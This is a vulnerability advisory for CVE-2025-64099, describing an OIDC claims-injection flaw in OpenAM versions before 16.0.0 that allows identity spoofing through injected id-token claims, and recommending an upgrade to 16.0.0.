CVE-2025-64099

Name of the Vulnerable Software and Affected Versions Open Access Management (OpenAM) versions prior to 16.0.0

Description Open Access Management (OpenAM) contains a flaw where, if the claims parameter supported parameter is enabled, the "oidc-claims-extension.groovy" script allows injection of arbitrary values into claims within the id token or user info. Specifically, requests to the authorize function do not prevent the injection of a claims parameter containing a JSON file. This JSON file enables customization of claims returned by the id token and user info files, potentially leading to various vulnerabilities depending on how clients utilize these claims. For example, if a client relies on the email field for user identification, an attacker can specify any email address and assume a chosen identity.

Recommendations Versions prior to 16.0.0 should be updated to version 16.0.0 or later.